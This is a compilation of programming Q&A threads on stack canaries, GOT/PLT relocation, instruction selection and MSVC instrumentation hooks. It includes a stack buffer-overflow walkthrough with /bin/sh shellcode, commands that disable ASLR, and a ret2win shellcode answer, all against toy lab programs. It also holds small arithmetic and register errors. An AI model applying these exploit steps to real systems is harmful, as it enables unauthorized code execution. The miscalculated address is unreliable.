Who is responsible for inserting the stack canaries in the stack? Is it the OS?
If yes, how can the gcc compiler disable them with the -fno-stack-protector option? Or does that option only set a flag in the binary that tells the OS not to insert canaries into the stack when the binary is loaded at runtime?
EDIT: one more question
Who checks whether the canary values were changed during execution?
Again, if they are inserted by the compiler, how can they be checked by the OS? If they are inserted by the OS, how can they be disabled by the compiler (main question)?
Who is responsible for inserting the stack canaries in the stack?
The compiler. The code for creating and checking stack canaries is a subset of the code generated by the compiler from the program source code.
For GCC:
-fstack-protector
Emit extra code to check for buffer overflows, such as stack smashing attacks. This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.
The aforementioned "guard variable" is commonly referred to as a canary:
The basic idea behind stack protection is to push a "canary" (a randomly chosen integer) on the stack just after the function return pointer has been pushed. The canary value is then checked before the function returns; if it has changed, the program will abort. Generally, stack buffer overflow (aka "stack smashing") attacks will have to change the value of the canary as they write beyond the end of the buffer before they can get to the return pointer. Since the value of the canary is unknown to the attacker, it cannot be replaced by the attack. Thus, the stack protection allows the program to abort when that happens rather than return to wherever the attacker wanted it to go. [1]
Example program:
Source code:
int test(int i) {
    return i;
}
int main(void) {
    int x;
    int i = 10;
    x = test(i);
    return x;
}
Function from binary compiled without -fstack-protector-all:
$ objdump -dj .text test | grep -A7 "<test>:"
00000000004004ed <test>:
4004ed: 55 push %rbp
4004ee: 48 89 e5 mov %rsp,%rbp
4004f1: 89 7d fc mov %edi,-0x4(%rbp)
4004f4: 8b 45 fc mov -0x4(%rbp),%eax
4004f7: 5d pop %rbp
4004f8: c3 retq
Function from binary compiled with -fstack-protector-all:
$ objdump -dj .text protected_test | grep -A20 "<test>:"
000000000040055d <test>:
40055d: 55 push %rbp
40055e: 48 89 e5 mov %rsp,%rbp
400561: 48 83 ec 20 sub $0x20,%rsp
400565: 89 7d ec mov %edi,-0x14(%rbp)
400568: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax <- get guard variable value
40056f: 00 00
400571: 48 89 45 f8 mov %rax,-0x8(%rbp) <- save guard variable on stack
400575: 31 c0 xor %eax,%eax
400577: 8b 45 ec mov -0x14(%rbp),%eax
40057a: 48 8b 55 f8 mov -0x8(%rbp),%rdx <- move it to register
40057e: 64 48 33 14 25 28 00 xor %fs:0x28,%rdx <- check it against original
400585: 00 00
400587: 74 05 je 40058e <test+0x31>
400589: e8 b2 fe ff ff callq 400440 <__stack_chk_fail@plt>
40058e: c9 leaveq
40058f: c3 retq
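What the instrumented prologue and epilogue do can be mimicked by hand in C. This is only a sketch under assumptions: demo_guard stands in for the random per-process value that the real code reads from %fs:0x28, struct demo_frame stands in for the stack frame layout, and the function returns a status where the real code would call __stack_chk_fail. None of these names come from GCC.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for the guard value read from %fs:0x28. */
static const unsigned long demo_guard = 0x5ca1ab1eUL;

/* Hypothetical frame layout: the canary sits right above the buffer. */
struct demo_frame {
    char buf[8];
    unsigned long canary;
};

/* Copies n bytes into the frame and reports whether the canary survived.
 * Returns 1 if the canary is intact, 0 if the copy clobbered it. */
int copy_with_canary(const char *src, size_t n)
{
    struct demo_frame f;

    f.canary = demo_guard;          /* "prologue": store the guard */

    if (n > sizeof f)               /* keep the simulated overflow inside f */
        n = sizeof f;
    memcpy(&f, src, n);             /* bytes past buf[7] land on the canary */

    return f.canary == demo_guard;  /* "epilogue": compare before returning */
}
```

A copy that stays within the 8-byte buffer leaves the canary alone, while a longer one changes it. That changed value is what the compiler-generated check detects before the function returns.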
1. "Strong" stack protection for GCC
I am trying to take control of this program with a shellcode.
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void func(char *arg)
{
    char name[32];
    strcpy(name, arg);  /* no bounds check: this is the overflow */
    printf("\nHello %s \n\n", name);
}
int main(int argc, char *argv[])
{
    if (argc != 2) {
        printf("Usage: %s NAME \n", argv[0]);
        exit(0);
    }
    func(argv[1]);
    printf("End of program \n\n");
    return 0;
}
With an input of 40 'A's the segmentation fault occurs, so the saved EIP has been overwritten. Since my shellcode is 23 bytes long, I add 17 'A's of padding after it. But I need the address of the beginning of the "name" buffer so that execution jumps to the shellcode there.
In this case, since there is only one local variable, it should be enough to know the value of ESP: being the top of the stack, it should match the buffer's address.
I've seen this program, which gets you an address close to ESP:
#include <stdio.h>
unsigned long get_sp(void) {
    /* Leaves ESP in EAX, which the caller reads as the return value. */
    __asm__("movl %esp,%eax");
}
int main(void) {
    printf("0x%lx\n", get_sp());
}
However, I always get a segmentation fault when executing the following:
./my_program `perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x 17 . "ESP address"'`
The program is compiled like this:
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack my_program.c -o my_program
How can I get the exact address of the beginning of the buffer, or of ESP?
0. Turn ASLR off
To keep things simple, we can disable ASLR. In a real-world exploit the address is randomized, so we would need to brute-force it.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
1. Compilation
ammarfaizi2@integral:~/ex/exp$ cat my_program.c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void func(char *arg)
{
    char name[32];
    strcpy(name, arg);
    printf("\nHello %s \n\n", name);
}
int main(int argc, char *argv[])
{
    if (argc != 2) {
        printf("Usage: %s NAME \n", argv[0]);
        exit(0);
    }
    func(argv[1]);
    printf("End of program \n\n");
    return 0;
}
ammarfaizi2@integral:~/ex/exp$ gcc -fno-stack-protector -zexecstack -m32 my_program.c -o my_program
ammarfaizi2@integral:~/ex/exp$
2. Calculating Offset
0000122d <func>:
122d: f3 0f 1e fb endbr32
1231: 55 push %ebp
1232: 89 e5 mov %esp,%ebp
/*
*
* At this point, we know that the return address is located at
* 0x4(%ebp).
*
*/
1234: 53 push %ebx
1235: 83 ec 24 sub $0x24,%esp
1238: e8 f3 fe ff ff call 1130 <__x86.get_pc_thunk.bx>
123d: 81 c3 8f 2d 00 00 add $0x2d8f,%ebx
1243: 83 ec 08 sub $0x8,%esp
1246: ff 75 08 push 0x8(%ebp)
1249: 8d 45 d8 lea -0x28(%ebp),%eax
124c: 50 push %eax
124d: e8 5e fe ff ff call 10b0 <strcpy@plt>
/*
*
* At this point, we know that the command line argument
* is copied to -0x28(%ebp)
*
*/
1252: 83 c4 10 add $0x10,%esp
1255: 83 ec 08 sub $0x8,%esp
1258: 8d 45 d8 lea -0x28(%ebp),%eax
125b: 50 push %eax
125c: 8d 83 3c e0 ff ff lea -0x1fc4(%ebx),%eax
1262: 50 push %eax
1263: e8 38 fe ff ff call 10a0 <printf@plt>
1268: 83 c4 10 add $0x10,%esp
126b: 90 nop
126c: 8b 5d fc mov -0x4(%ebp),%ebx
126f: c9 leave
1270: c3 ret
To reach the return address starting from -0x28(%ebp), we need to write 0x4 - (-0x28) = 0x2c bytes (44 bytes).
We have 23 bytes of shellcode.
We need 21 bytes of padding to bring the payload to 44 bytes and reach the return address.
We need 4 bytes for the malicious return address; we use \x11\x11\x11\x11 for the moment, as we don't know it yet.
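The layout described above (shellcode, then padding up to the return-address offset, then the 4-byte address) can be sketched as a small C helper. The function name build_payload and its parameters are made up for illustration; only the numbers 23, 44 and the 'A' filler come from the walkthrough.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Lays out: shellcode | 'A' padding up to ret_offset | 4-byte return address.
 * Returns the payload length, or 0 if the pieces do not fit. */
size_t build_payload(unsigned char *out, size_t out_size,
                     const unsigned char *shellcode, size_t sc_len,
                     size_t ret_offset, uint32_t ret_addr)
{
    if (sc_len > ret_offset || out_size < 4 || ret_offset > out_size - 4)
        return 0;

    memcpy(out, shellcode, sc_len);
    memset(out + sc_len, 'A', ret_offset - sc_len);

    /* x86 is little-endian: least significant byte first. */
    out[ret_offset + 0] = (unsigned char)(ret_addr & 0xff);
    out[ret_offset + 1] = (unsigned char)((ret_addr >> 8) & 0xff);
    out[ret_offset + 2] = (unsigned char)((ret_addr >> 16) & 0xff);
    out[ret_offset + 3] = (unsigned char)((ret_addr >> 24) & 0xff);

    return ret_offset + 4;
}
```

With sc_len = 23 and ret_offset = 44 this writes 21 padding bytes and returns 48, matching the perl one-liner used in the test run.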
Test Execute
ammarfaizi2@integral:~/ex/exp$ ./my_program $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","A"x21,"\x11\x11\x11\x11"')
Hello 1�Ph//shh/bin��PS��
AAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
ammarfaizi2@integral:~/ex/exp$ dmesg | tail -n 2
[56448.175467] my_program[117895]: segfault at 11111111 ip 0000000011111111 sp 00000000ffffd3c0 error 14 in my_program[56555000+1000]
[56448.175493] Code: Bad RIP value.
ammarfaizi2@integral:~/ex/exp$
At this point we have been able to overwrite the EIP value. The next step is to find the shellcode address.
3. Finding Shell Code Address
Notice that the segfault happens after leave and ret have restored esp. So we need to find out how many bytes were subtracted from esp when func's stack frame was created.
Notice how esp changes
; From main function
call func ; -4 bytes
; Setup stack frame
push %ebp ; -4 bytes
mov %esp,%ebp ; At this point %ebp = %esp
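Those two pushes account for 8 bytes, and our shellcode is located at -0x28(%ebp), i.e. 40 bytes below %ebp. So the buffer starts 8 + 40 = 48 bytes below the value esp has at the fault.
The last segfault was reported at SP = 0xffffd3c0.
Hence the target return address is 0xffffd3c0 - 48 = 0xffffd390.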
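The same arithmetic as a minimal C sketch. The helper name buffer_address is hypothetical, and it assumes exactly the frame layout shown above: a 4-byte return address, a 4-byte saved ebp, and the buffer at a fixed offset below ebp.

```c
#include <stdint.h>

/* After func's ret, esp = (ebp inside func) + 8: 4 bytes for the saved ebp
 * and 4 bytes for the return address. The buffer starts buf_offset bytes
 * below that ebp. */
uint32_t buffer_address(uint32_t sp_at_fault, uint32_t buf_offset)
{
    uint32_t ebp_in_func = sp_at_fault - 8;
    return ebp_in_func - buf_offset;
}
```

buffer_address(0xffffd3c0, 0x28) gives 0xffffd390. Note that the total subtracted is decimal 48 (0x30): for a faulting sp of 0xbffff760, for instance, the same layout gives 0xbffff730.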
4. Execute Exploit
Notice that x86 uses little-endian byte order, so the bytes of the address must be written in reverse order.
0xffffd390 is written as \x90\xd3\xff\xff.
So replace \x11\x11\x11\x11 with \x90\xd3\xff\xff:
ammarfaizi2@integral:~/ex/exp$ ./my_program $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","A"x21,"\x90\xd3\xff\xff"')
Hello 1�Ph//shh/bin��PS��
AAAAAAAAAAAAAAAAAAAAA����
$ date
Sat Apr 3 14:47:02 WIB 2021
$ whoami
ammarfaizi2
$ exit
ammarfaizi2@integral:~/ex/exp$
1. Turn off ASLR and compilation
cat /proc/sys/kernel/randomize_va_space
0
gcc -fno-stack-protector -zexecstack -m32 prog.c -o prog2
08048474 <func>:
8048474: 55 push %ebp
8048475: 89 e5 mov %esp,%ebp
8048477: 83 ec 38 sub $0x38,%esp
804847a: 8b 45 08 mov 0x8(%ebp),%eax
804847d: 89 44 24 04 mov %eax,0x4(%esp)
8048481: 8d 45 d8 lea -0x28(%ebp),%eax
8048484: 89 04 24 mov %eax,(%esp)
8048487: e8 e4 fe ff ff call 8048370 <strcpy@plt>
804848c: b8 d0 85 04 08 mov $0x80485d0,%eax
8048491: 8d 55 d8 lea -0x28(%ebp),%edx
8048494: 89 54 24 04 mov %edx,0x4(%esp)
8048498: 89 04 24 mov %eax,(%esp)
804849b: e8 c0 fe ff ff call 8048360 <printf@plt>
80484a0: c9 leave
80484a1: c3 ret
080484a2 <main>:
80484a2: 55 push %ebp
80484a3: 89 e5 mov %esp,%ebp
80484a5: 83 e4 f0 and $0xfffffff0,%esp
80484a8: 83 ec 10 sub $0x10,%esp
80484ab: 83 7d 08 02 cmpl $0x2,0x8(%ebp)
80484af: 74 22 je 80484d3 <main+0x31>
80484b1: 8b 45 0c mov 0xc(%ebp),%eax
80484b4: 8b 10 mov (%eax),%edx
80484b6: b8 f5 85 04 08 mov $0x80485f5,%eax
80484bb: 89 54 24 04 mov %edx,0x4(%esp)
80484bf: 89 04 24 mov %eax,(%esp)
80484c2: e8 99 fe ff ff call 8048360 <printf@plt>
80484c7: c7 04 24 00 00 00 00 movl $0x0,(%esp)
80484ce: e8 cd fe ff ff call 80483a0 <exit@plt>
80484d3: 8b 45 0c mov 0xc(%ebp),%eax
80484d6: 83 c0 04 add $0x4,%eax
80484d9: 8b 00 mov (%eax),%eax
80484db: 89 04 24 mov %eax,(%esp)
80484de: e8 91 ff ff ff call 8048474 <func>
80484e3: c7 04 24 05 86 04 08 movl $0x8048605,(%esp)
80484ea: e8 91 fe ff ff call 8048380 <puts@plt>
80484ef: b8 00 00 00 00 mov $0x0,%eax
80484f4: c9 leave
80484f5: c3 ret
2. Test Execute
./prog2 $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x21 . "\x11\x11\x11\x11"')
Hello 1▒Ph//shh/bin▒▒PS▒▒
̀AAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
dmesg | tail -n 2
[82020.945063] prog2[11078]: segfault at d0080484 ip bffff71c sp bffff760 error 5
[82669.199863] prog2[11100]: segfault at 11111111 ip 11111111 sp bffff760 error 14
Last segfault is at 0xbffff760, so: 0xbffff760 - 48 = 0xbffff718
./prog2 $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x21 . "\x18\xf7\xff\xbf"')
Hello 1▒Ph//shh/bin▒▒PS▒▒
̀AAAAAAAAAAAAAAAAAAAAA▒▒▒
Segmentation fault (core dumped)
dmesg | tail -n 2
[82669.199863] prog2[11100]: segfault at 11111111 ip 11111111 sp bffff760 error 14
[82857.841068] prog2[11108] general protection ip:bffff718 sp:bffff760 error:0
I have the following dump taken from gdb
00000000004006f6 <win>:
4006f6: 55 push rbp
4006f7: 48 89 e5 mov rbp,rsp
4006fa: bf 98 08 40 00 mov edi,0x400898
4006ff: e8 8c fe ff ff call 400590 <system@plt>
400704: 5d pop rbp
400705: c3 ret
Usually this C function is never called; however, I need to write some shellcode that's less than 10 bytes to run it or get the value displayed. Here is the source of the function:
void win(){
    system("/bin/cat ./flag.txt");
}
I'm still a novice at both assembly and C, so any help is appreciated.
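To run the function win(), your shellcode must push the address of win and then execute ret (push <function-win-address>; ret).
In your case that will be:
\x68\xf6\x06\x40\x00\xc3
\x68 is push (it takes a 4-byte immediate)
\xf6\x06\x40\x00 is the function address 0x004006f6 in little-endian byte order
\xc3 is ret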
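As a cross-check of the byte sequence, here is a minimal C sketch that encodes "push imm32; ret" for a given address. The helper name encode_push_ret is made up for illustration. It assumes the target fits in the 4-byte immediate of opcode 0x68; in 64-bit mode that immediate is sign-extended, so the address must be below 0x80000000, which holds for 0x4006f6.

```c
#include <stddef.h>
#include <stdint.h>

/* Writes "push imm32; ret" for the given target into out (6 bytes).
 * Returns the number of bytes written. */
size_t encode_push_ret(uint32_t target, unsigned char out[6])
{
    out[0] = 0x68;                                   /* push imm32 */
    out[1] = (unsigned char)(target & 0xff);         /* little-endian address */
    out[2] = (unsigned char)((target >> 8) & 0xff);
    out[3] = (unsigned char)((target >> 16) & 0xff);
    out[4] = (unsigned char)((target >> 24) & 0xff);
    out[5] = 0xc3;                                   /* ret */
    return 6;
}
```

For target 0x4006f6 this produces 68 f6 06 40 00 c3, six bytes in total and within the 10-byte limit. The zero byte is part of the immediate, which matters if the input path stops at NUL characters.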
Alternatively:
mov eax, (win addr)
call rax
Then assemble it and read the opcodes from objdump.
Let's consider the following function:
#include <stdint.h>
uint64_t foo(uint64_t x) { return x * 3; }
If I were to write it, I'd do
.global foo
.text
foo:
imul $0x3, %rdi, %rax
ret
On the other hand, the compiler generates two additions, with -O0:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 48 89 7d f8 mov %rdi,-0x8(%rbp)
8: 48 8b 55 f8 mov -0x8(%rbp),%rdx
c: 48 89 d0 mov %rdx,%rax
f: 48 01 c0 add %rax,%rax
12: 48 01 d0 add %rdx,%rax
15: 5d pop %rbp
16: c3 retq
or lea with -O2:
0000000000000000 <foo>:
0: 48 8d 04 7f lea (%rdi,%rdi,2),%rax
4: c3 retq
Why? Since every assembly instruction equals one processor clock tick, my version should run in 2 CPU clock cycles (it has two instructions). The -O0 version needs 4 cycles to perform the addition, because it could be rewritten to
mov %rdi,%rax
add %rax,%rax
add %rdi,%rax
retq
and the lea version should take two cycles as well.
You're targeting a processor with dedicated address-calculation units. It's likely to be faster to compute small multiplications in the address calculator than in a general-purpose arithmetic/logic unit (ALU).
Also, depending on your processor model, the ALU may be shared with other code, either due to hyperthreading or by speculative or out-of-order execution within the same thread. Your compiler is making a good estimate of how best to utilise the available resources to give a good throughput of execution without stalling.
The idea that "every assembly instruction equals one processor clock tick" (or even a fixed number of cycles) has only ever been true on the very simplest of processors.
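The three instruction sequences in the question compute the same value, which is what lets the compiler choose among them freely. A minimal C sketch of that equivalence follows. The function names are illustrative, and which instructions a compiler actually emits for each depends on the compiler, flags and target.

```c
#include <stdint.h>

/* The source-level form: a plain multiplication. */
uint64_t mul3_imul(uint64_t x)
{
    return x * 3;
}

/* Mirrors the -O0 output: double the value, then add the original. */
uint64_t mul3_add(uint64_t x)
{
    uint64_t r = x;
    r += r;
    r += x;
    return r;
}

/* Mirrors lea (%rdi,%rdi,2): base plus index scaled by 2. */
uint64_t mul3_lea(uint64_t x)
{
    return x + (x << 1);
}
```

Because unsigned arithmetic wraps modulo 2^64, all three agree for every input, including values where x * 3 overflows.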
I now understand how dynamic functions are referenced, through the procedure linkage table, as below:
Dump of assembler code for function foo@plt:
0x0000000000400528 <foo@plt+0>: jmpq *0x2004d2(%rip) # 0x600a00 <_GLOBAL_OFFSET_TABLE_+40>
0x000000000040052e <foo@plt+6>: pushq $0x2
0x0000000000400533 <foo@plt+11>: jmpq 0x4004f8
(gdb) disas 0x4004f8
No function contains specified address.
But I don't know how dynamic variables are referenced. I found that the values are populated in the GOT once the program has started, but there's no stub like the one above. How does it work?
The dynamic loader relocates all references to variables before transferring control to the user program.
There is no "stub" for them, because once the user program starts executing, it is not possible for the loader to regain control and update variable addresses. If this isn't clear to you, then you have not really understood how the PLT lazy-resolution stub works.
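The lazy-resolution idea can be mimicked in plain C with a function pointer that initially points at a resolver. This is a sketch with hypothetical names (got_foo, resolve_foo, resolver_calls), not what the dynamic loader literally does. It shows why the trick needs a call to intercept, which a plain variable access does not offer.

```c
/* Hypothetical names throughout; a real PLT/GOT is set up by the linker. */
int resolver_calls;                  /* how often the slow path ran */

static int real_foo(int x) { return x + 1; }
static int resolve_foo(int x);

/* "GOT slot" for foo: initially points at the resolver stub. */
static int (*got_foo)(int) = resolve_foo;

/* The first call lands here: look up foo, patch the slot, forward the call. */
static int resolve_foo(int x)
{
    resolver_calls++;
    got_foo = real_foo;
    return real_foo(x);
}

/* What a call through the PLT amounts to: an indirect jump via the slot. */
int call_foo(int x)
{
    return got_foo(x);
}
```

The first call_foo goes through the resolver, and every later call goes straight to real_foo. A load from a variable has no such hook point, so variable addresses have to be filled in before the program starts.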
Global variables are accessed indirectly, via a global offset table.
When compiling a program, the compiler generates code that performs
indirect accesses, and emits relocation information specifying the
entry in the global offset table being used.
The linker performs these relocations when creating the final
dynamically loadable object, resulting in machine code that does not
need further patching at load time.
To see this in action, consider the following code fragment.
int v1;
int f(void) { return !v1; }
The function f references a global v1. The machine code generated
for the function looks like the following (on an i386):
% gcc -c -fpic a.c
% objdump --disassemble --reloc a.o
[snip]
Disassembly of section .text:
00000000 <f>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: e8 fc ff ff ff call 4 <f+0x4>
4: R_386_PC32 __i686.get_pc_thunk.cx
8: 81 c1 02 00 00 00 add $0x2,%ecx
a: R_386_GOTPC _GLOBAL_OFFSET_TABLE_
e: 8b 81 00 00 00 00 mov 0x0(%ecx),%eax
10: R_386_GOT32 v1
14: 8b 00 mov (%eax),%eax
16: 85 c0 test %eax,%eax
18: 0f 94 c0 sete %al
1b: 0f b6 c0 movzbl %al,%eax
1e: 5d pop %ebp
1f: c3 ret
Disassembly of section .text.__i686.get_pc_thunk.cx:
00000000 <__i686.get_pc_thunk.cx>:
0: 8b 0c 24 mov (%esp),%ecx
3: c3 ret
Machine code walk-through:
(Offsets 0x0 and 0x1) The standard function prologue.
(Offset 0x3) The call to __i686.get_pc_thunk.cx prepares for
PC-relative addressing by loading the address of the instruction
after the call into register %ecx.
(Offset 0x8) The value in %ecx is adjusted to point to the start
of the global offset table. This adjustment is signalled by the
relocation entry of type R_386_GOTPC.
(Offset 0xE) The address of global v1 is retrieved. The
R_386_GOT32 relocation supplies the offset of v1's entry from
the base of the global offset table.
(Offset 0x14) The value in v1 is retrieved into register %eax.
(Offsets 0x16 to 0x1F) The rest of the computation for function f.
In the final shared object, the linker patches the function's code to
the following:
% gcc -shared -o a.so a.o
% objdump --disassemble a.so
...snip...
0000044c <f>:
44c: 55 push %ebp
44d: 89 e5 mov %esp,%ebp
44f: e8 18 00 00 00 call 46c <__i686.get_pc_thunk.cx>
454: 81 c1 a0 1b 00 00 add $0x1ba0,%ecx
45a: 8b 81 f8 ff ff ff mov -0x8(%ecx),%eax
460: 8b 00 mov (%eax),%eax
462: 85 c0 test %eax,%eax
...snip...
Assuming that the object gets loaded at offset O in memory, the
call instruction at offset 0x44F loads O+0x454 into %ecx, and the
add at offset 0x454 brings it to O+0x454+0x1BA0, i.e., O+0x1FF4.
The instruction at offset 0x45A reads from 8 bytes below %ecx,
which is the address of the slot for v1 in the global offset table,
i.e., the slot for v1 is at offset 0x1FEC from the start of the
shared object.
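The offset arithmetic can be checked with a few lines of C. The helper name got_slot_offset is hypothetical; the three inputs are the values read off the disassembly (address after the call, the add immediate, and the displacement of the load).

```c
#include <stdint.h>

/* Offset of a GOT slot relative to the load address of the object. */
uint32_t got_slot_offset(uint32_t pc_after_call, uint32_t add_imm, int32_t disp)
{
    uint32_t got_base = pc_after_call + add_imm;  /* %ecx after the add */
    return got_base + (uint32_t)disp;             /* modular, so a negative disp works */
}
```

got_slot_offset(0x454, 0x1ba0, -8) yields 0x1fec.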
Looking at the dynamic relocation records for the shared object, we
see a relocation record instructing the runtime loader to store the
actual address for v1 at offset 0x1FEC.
% objdump -R a.so
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
...snip...
00001fec R_386_GLOB_DAT v1
...snip...
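Seen from C, the effect of this relocation is that f reaches v1 through a pointer that somebody else filled in beforehand. A minimal sketch, in which the one-entry demo_got table and demo_relocate are hypothetical stand-ins for the real GOT and for the runtime loader:

```c
int v1;

/* Hypothetical one-entry GOT: filled in by the loader, read by the code. */
static int *demo_got[1];

/* Stand-in for the runtime loader processing the relocation for v1. */
void demo_relocate(void)
{
    demo_got[0] = &v1;
}

/* f as the -fpic code executes it: fetch v1's address from the GOT slot,
 * then load v1 through that address. */
int f(void)
{
    int *addr = demo_got[0];
    return !*addr;
}
```

demo_relocate must run before the first call to f, just as the loader fills the real slot before control reaches the program.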
Further reading:
Pat Beirne's "Study of ELF loading and relocs" has more information about ELF relocations.
There are compiler options in MSVC to enable the automatic generation of instrumentation calls on entering and exiting functions. These hooks are called _penter() and _pexit(). The options to the compiler are:
/Gh Enable _penter Hook Function
/GH Enable _pexit Hook Function
Is there a pragma or some sort of function declaration that will turn off the instrumentation on a per function basis? I know that using __declspec(naked) functions will not be instrumented but this isn't always a very practical option. I'm using MSVC both on PC and on a non-X86 platform and the non-X86 platform is a pain to manually write epilog/prolog in assembler (not to mention it messes up the debugger stack tracing).
If this is only possible on a per-file (compiler option) basis, I think I will have to split out the special functions into a separate file to turn the option off, but it'd be much easier if I could control it on a per-function basis.
The fallback plan if this can't be done is to just move the functions to their own CPP translation unit and compile separately without the options.
I don't see any way to do this. Given that you would have to locate and handle every affected function anyway, perhaps moving them into their own module(s) is not such a big deal.
The asker is aware of this, but it is worth writing out the disqualified approach for future reference. /Gh and /GH do not instrument naked functions. You can declare the function you want to opt out as naked and manually supply the standard prolog/epilog, as shown below:
void instrumented_fn(void *p)
{
    /* Function body */
}
__declspec(naked) void uninstrumented_fn(void *p)
{
    __asm
    {
        /* prolog */
        push ebp
        mov ebp, esp
        sub esp, __LOCAL_SIZE
    }
    /* Function body */
    __asm
    {
        /* epilog */
        mov esp, ebp
        pop ebp
        ret
    }
}
An example instrumented function disassembly, showing the calls to _penter and _pexit:
537b0: e8 7c d9 ff ff call 0x51131
537b5: 55 push %ebp
537b6: 8b ec mov %esp,%ebp
537b8: 83 ec 40 sub $0x40,%esp
537bb: 53 push %ebx
537bc: 56 push %esi
537bd: 57 push %edi
537be: 90 nop
537bf: 90 nop
537c0: 90 nop
537c1: 5f pop %edi
537c2: 5e pop %esi
537c3: 5b pop %ebx
537c4: 8b e5 mov %ebp,%esp
537c6: 5d pop %ebp
537c7: e8 01 d9 ff ff call 0x510cd
537cc: c3 ret
The equivalent uninstrumented function disassembly (naked body plus standard prolog/epilog)
51730: 55 push %ebp
51731: 8b ec mov %esp,%ebp
51733: 83 ec 40 sub $0x40,%esp
51736: 90 nop
51737: 90 nop
51738: 90 nop
51739: 8b e5 mov %ebp,%esp
5173b: 5d pop %ebp
5173c: c3 ret
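The difference between the two disassemblies can be pictured in portable C by writing the hook calls out by hand. This is only an emulation under assumptions: demo_penter and demo_pexit are hypothetical stand-ins, whereas the real _penter/_pexit hooks are supplied by the user and called by compiler-generated code, not by source-level calls.

```c
int enter_count;
int exit_count;

/* Hypothetical stand-ins for the user-supplied _penter/_pexit hooks. */
static void demo_penter(void) { enter_count++; }
static void demo_pexit(void)  { exit_count++; }

/* What /Gh and /GH effectively add: a hook call first and last. */
int hooked_fn(int x)
{
    int result;

    demo_penter();
    result = x * 2;
    demo_pexit();
    return result;
}

/* The same body without the hooks, as when built without /Gh and /GH. */
int plain_fn(int x)
{
    return x * 2;
}
```

Both functions return the same result, and only hooked_fn touches the counters. That is the behaviour one gets by moving a function into a translation unit compiled without the options.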